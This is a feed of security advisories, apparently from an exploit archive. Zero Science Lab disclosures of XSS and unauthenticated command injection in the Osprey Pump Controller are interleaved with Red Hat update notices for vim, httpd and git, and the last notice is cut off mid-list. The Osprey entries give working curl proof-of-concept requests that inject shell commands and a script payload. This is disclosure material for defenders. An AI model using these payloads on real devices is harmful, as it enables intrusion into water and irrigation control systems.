Osprey Pump Controller version 1.0.1 suffers from a cross site scripting vulnerability.

    Osprey Pump Controller 1.0.1 Unauthenticated Reflected XSSVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: Input passed to the GET parameter 'userName' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5751Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php05.01.2023--http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

Osprey Pump Controller 1.0.1 Cross Site Scripting

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the eventFileSelected HTTP GET parameter called by DataLogView.php, EventsView.php and AlarmsView.php scripts.

    Osprey Pump Controller 1.0.1 (eventFileSelected) Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'eventFileSelected' HTTP GETparameter called by DataLogView.php, EventsView.php and AlarmsView.phpscripts.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5750Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5750.php05.01.2023--$ curl -s http://TARGET/DataLogView.php?eventFileSelected=;id$ curl -s http://TARGET/EventsView.php?eventFileSelected=|id$ curl -s http://TARGET/AlarmsView.php?eventFileSelected=`id`HTTP/1.1 200 OKuid=33(www-data) gid=33(www-data) groups=33(www-data)

Osprey Pump Controller 1.0.1 eventFileSelected Command Injection

Red Hat Security Advisory 2023-0958-01 - Vim is an updated and improved version of the vi editor.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: vim security update  
Advisory ID:       RHSA-2023:0958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0958  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-47024   
=====================================================================

1. Summary:

An update for vim is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Vim (Vi IMproved) is an updated and improved version of the vi editor.

Security Fix(es):

* vim: no check if the return value of XChangeGC() is NULL (CVE-2022-47024)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163613 - CVE-2022-47024 vim: no check if the return value of XChangeGC() is NULL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
vim-X11-8.2.2637-20.el9_1.aarch64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

ppc64le:  
vim-X11-8.2.2637-20.el9_1.ppc64le.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-8.2.2637-20.el9_1.s390x.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-8.2.2637-20.el9_1.x86_64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
vim-8.2.2637-20.el9_1.src.rpm

aarch64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

noarch:  
vim-filesystem-8.2.2637-20.el9_1.noarch.rpm

ppc64le:  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47024  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zu9zjgjWX9erEAQjjqw//RfPjkA9+ULyz/haWxVeFiOp4pKtsrL6l  
Zbah1fUhP4U+JrjzxGTrRPGpNXDlxV6xm8Po79jk7VfsZ2VekOaspp/hCqs7PQbW  
8Wc7jkPpUh9Lk0elFvvyxIQ6OZEjT+pfTvu0orbLC4cJwAbM7cylT/uZlBiMqQWQ  
FDETC9NzwZkKtOL6Nw+r04Qa1VEszWM17wbGWboMT2abXgLT/C/sGOcGh7id+Jbr  
7NEuzrG18lq1jRTSWU72Pmz+Vxd0mk4mwS2YcZh9uYDLYOcKcDOWQzQH1Y341fO3  
ZcsKNCtrW1ZTqXcZYiv/4Tn4ttELdM0Rt+SiOnE7H6G1GA3FCo4NmBk9mx8BQX10  
r9I+TJllCAM1zr/HVIA95oWpji2np7cT3fxzMwkor5OBlGsVukFws4ZabEWgO/Jo  
I6rLp6Ips+KA73chHAGCdbz3bAjcfFJMqPoxFKS0XGh7d1lT6+zGax1NhsJDkIdM  
TG1SwtA54UeaQboKPLdQTKXiAlNA6hG0cc5g0PKvwpGKrVNb/g+rB5lMhhNq0lkC  
53mSm9fB5IZPsjJB3qYDvhKFUhfrBKZZtlZ0rc4+g7AyOGqx48QaJb2u5MgXg512  
ZXYDMWsZdgT9s9mIUNgKRmIj1z+qnrmX21XTFqvpn6Fb6Ss5CT7HCaUwkKkwWj2O  
4nohN9fIiz4=  
=Evof  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0958-01

Red Hat Security Advisory 2023-0970-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include HTTP response splitting and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd security and bug fix update  
Advisory ID:       RHSA-2023:0970-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0970  
Issue date:        2023-02-28  
CVE Names:         CVE-2006-20001 CVE-2022-36760 CVE-2022-37436   
=====================================================================

1. Summary:

An update for httpd is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_dav: out-of-bounds read/write of zero byte (CVE-2006-20001)

* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-36760)

* httpd: mod_proxy: HTTP response splitting (CVE-2022-37436)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* httpd-init fails to create localhost.crt, localhost.key due to "sscg"  
default now creates a /dhparams.pem and is not idempotent if the file  
/dhparams.pem already exists. (BZ#2165975)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2161773 - CVE-2022-37436 httpd: mod_proxy: HTTP response splitting  
2161774 - CVE-2006-20001 httpd: mod_dav: out-of-bounds read/write of zero byte  
2161777 - CVE-2022-36760 httpd: mod_proxy_ajp: Possible request smuggling

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.1.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.1.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.1.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2006-20001  
https://access.redhat.com/security/cve/CVE-2022-36760  
https://access.redhat.com/security/cve/CVE-2022-37436  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zuNzjgjWX9erEAQj8Rw/+Lo4L2fajs5cjfJGlBZU9i7mBNfFCJCks  
BSZ63H60gFLhncObvfY3N2wlNjyKL5lWA2w6hgTjnvhUQgYTkEVay7tgtLt359oy  
6c2J8ZKvjhBNeVqLhgnI5/gzzXsqVPwRLlRWlHZwrp1o5Edx0GDpcQUZTvCG46Uy  
oXpacnO9DnWuCMjiTCkM+MUFYrpZxVq4ezjOp1pB5ySlX4c2k3wYP3Usw0H88ZK+  
tVS/Cupd9JItOLriPlRJWQzuddtlzFe8KbETUOPcrOBwdgDupmUhYRPuBDwUuIKP  
4dgJ2t33fJGrPzCAArJkHnwgPchYrAEqvfbjwgLD4sBMr2mu40axgTKP6XYJ5ZsU  
Y6v/bszTLGnqJ5AoPs06PZoetU7Qt9hDN8FFJJK5ou1yTXMCpoyYj9QaQ4qkKfKC  
P/ooesrX2BSo/mrnx0XL0SoSPiKuHGKE8T0dhdw12N5mFrR/IWNxi5/u7o0jrIUt  
6qCz4jNS4xgMbdAMVvxO+CUbmO260S57kEvm+YHXxSSNZYGbDQpvx9EnCLvuraDK  
CHyUPjWHh1/a3xisc+KCn2CJf9gBMwCd7MpcU0enScrAUUE/VYtSejnfjP6NF1js  
gK0pSZN/G+YMRtBjajTCwPIAA6nAZt3zBJSfpxxJP26qT9oOpz/SxXcPFz2IbE28  
ZB4pvXtUnng=  
=WleW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0970-01

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the userName HTTP POST parameter called by index.php script.

    Osprey Pump Controller 1.0.1 (userName) Blind Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'userName' HTTP POST parametercalled by index.php script.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5749Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5749.php05.01.2023--$ curl -s http://TARGET/index.php --data="userName=;sleep%2017&pseudonym=251"HTTP/1.1 200 OK

Osprey Pump Controller 1.0.1 userName Command Injection

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the pseudonym HTTP POST parameter called by index.php script.

    Osprey Pump Controller 1.0.1 (pseudonym) Semi-blind Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'pseudonym' HTTP POST parametercalled by index.php script.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5748Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5748.php05.01.2023--$ curl -s http://TARGET/index.php --data="userName=thricer&pseudonym=%3Bpwd"HTTP/1.1 200 OK$ sleep 3$ #Reflected URL Address Bar: http://TARGET/index.php?userName=thricer&sessionCode=/var/www/html

Osprey Pump Controller 1.0.1 pseudonym Command Injection

Red Hat Security Advisory 2023-0978-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection. Issues addressed include heap overflow and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:0978-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0978  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-23521 CVE-2022-41903   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
